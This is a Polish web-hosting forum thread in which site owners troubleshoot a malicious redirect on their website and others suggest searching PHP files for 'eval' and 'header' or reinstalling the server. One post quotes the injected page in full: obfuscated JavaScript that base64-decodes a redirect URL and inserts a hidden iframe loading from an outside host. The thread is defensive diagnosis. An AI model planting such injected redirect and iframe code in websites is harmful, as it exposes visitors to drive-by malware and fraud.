Jump to content
Sign in to follow this  
sz3lo

Wirus(?) przekierowanie na stronie

Recommended Posts

Ostatnio miałem podobnie. Nie mogłem znaleźć "podjerzanego" pliku. Znalazłem go przypadkiem, analizując kod wczytywanych plików.

Okazało się, że data modyfikacji była niezmieniona (z 2010 roku, z dnia kiedy wgrywałem pliki na serwer) i to mnie zmyliło...

Radzę więc przejrzeć pliki dokładnie, szczególnie te z "head", "foot", "index" w nazwie.


Reklama internetowa - marketing w wyszukiwarkach || Pozycjonowanie Poznań - skutecznie i profesjonalnie || Słownik online Slowka.info - tłumacz online

Share this post


Link to post
Share on other sites

Czyli, dobrze rozumiem, problem jest po stronie serwera?

Może tak być. Najszybciej to sprawdzisz wrzucając testowo stronę na inny serwer. To coś zapisuje sobie nowe IP i przekierowuje dwa pierwsze żądania. IP zapisuje w pliku lub bazie danych. Więc możesz tym tropem to odnaleźć, po dacie modyfikacji. To dedyk?

Jeżeli chodzi o pliki PHP, to poszukaj w nich słów "header" i "eval" i zobacz czy tam nie ma złośliwego kodu.


nihil fit sine causa

Share this post


Link to post
Share on other sites

To nie jest dedyk, tylko zwykły hosting w mzone.

Mimo że usunałem wszystko i wgrałem czyste pliki to zdaje się dalej występuje, użytkownik wysłał mi kod jaki to generuje przy przekierowaniu:

<html><head><title>index</title></head><body><script>

function b64dc(str) {
var b64c = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg'+'hijklmnopqrstuvwxyz0123456789+/=';
var b64d = '', chr1, chr2, chr3, enc1, enc2, enc3, enc4;
str = str.replace(/[^a-z0-9+/=]/gi, '');
for (var i=0; i<str.length;) {
enc1 = b64c.indexOf(str.charAt(i++));
enc2 = b64c.indexOf(str.charAt(i++));
enc3 = b64c.indexOf(str.charAt(i++));
enc4 = b64c.indexOf(str.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
b64d = b64d + String.fromCharCode(chr1);
if (enc3 < 64) { b64d += String.fromCharCode(chr2); }
if (enc4 < 64) { b64d += String.fromCharCode(chr3); }
}
return b64d;
};

function gotime() { xflag=false; if (typeof(location.replace)!='undefined') { top.location.replace( b64dc("aHR0cDovLzFwMXhxOWE4ajltenYxM
XM0dWcxeWk3LmFuYWxhY2NvdW50cy5jb20vYWRzb3J0LnBocD95eT0xJmFpZD0yJmF0cj1leHRzJnNyYz0xODQ=") ); } else
{ top.location.href = b64dc("aHR0cDovLzFwMXhxOWE4ajltenYxMXM0dWcxeWk3LmFuYWxhY2NvdW50cy5jb20vYWRzb3J0LnBocD95eT0xJmFpZD0yJmF0cj1leHRzJnNyYz0xODQ="); }; }; var timer=setTimeout("gotime()", 21000);
var msdeo;
msdeo=document.createElement("span");
msdeo.innerHTML=b64dc("PGlmcmFtZSBzcmM9Imh0dHA6Ly9hZW11ZmVpZi5zaGVldGhvby5jb206ODAwMC9hcmx3ZWxqP2VlcG9xY3JmZj0zODk2MTc2IiB3aWR0aD0iMTIwIiAgaGVpZ2h0PSIyMSIgbWFyZ2lud2lkdGg9IjAiIG1hcm
dpbmhlaWdodD0iMCIgZnJhbWVib3JkZXI9IjAiICBzY3JvbGxpbmc9Im5vIiBhbGxvd3RyYW5zcGFyZW5jeT0idHJ1ZSI+PC9pZnJhbWU+PGJyPg==");
setTimeout(function() { document.body.insertBefore(msdeo,document.body.lastChild); }, 781);
</script></body></html>

Masakra, czwarty dzień nad tym siedze i nic...

Nie widze żadnych nietypowych plików, katalogów - nic nowego po dacie modyfikacji wcześniej nie znalazłem. Przejrzałem też chyba wszystkie pliki, które są używane przy generowaniu tej strony, żadnych podejrzanych kodów... Chyba pozostaje tylko opcja ze zmianą hosta, bo nie wiem już co robić.


zrób to jeszcze raz pożegnasz się z forum...

Share this post


Link to post
Share on other sites

Dziwne to masz. Kliknąłem na link ze stopki i przekierowało na "adultfriendfinder. com" , ale jak kliknąłem 2 raz to juz normalnie się stronka załadowała i przy kolejnych próbach wszystko działa jak należy

Share this post


Link to post
Share on other sites

Dwie osoby z tego serwera zgłosiły bardzo podobny problem, serwer jest systemtycznie skanowany i problem nie występuje na innych kontach klientów np o stronach o innej tematyce.

Co ciekawe oboje klienci posiadają strony o takiej samej tematyce(nie będę pisał o jaką tematykę chodzi, jest to bardzo popularna tematyka zarobkowej strony ostatnio, więc trojan może się dostać w zasadzie nawet przy aktualizacji strony poprzez FTP).

Trojan często jest zreplikowany poprzez użycie np aplikacji Total Commander: http://www.f-secure....inowal_cp.shtml

Konta przenieśliśmy na inny serwer dla bezpieczeństwa, jeśli jednak są to dziurawe plugin nic nie będziemy mogli tutaj pomóc i problem prawdopodobnie nie zniknie.

Trojan ukryty w skrypcie może się aktywować tylko w niektórych okolicznościach, wtedy będzie bardzo trudno go wykryć na danym koncie.

Tu proponowałbym reinstalację całego serwera i wgranie czystej kopii od nowa. Zmiana haseł może tutaj wcale nie pomóc.


| Teraz oferujemy serwery VPS i hosting dedykowany także na terenie Polski |

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue. Terms of Use Privacy Policy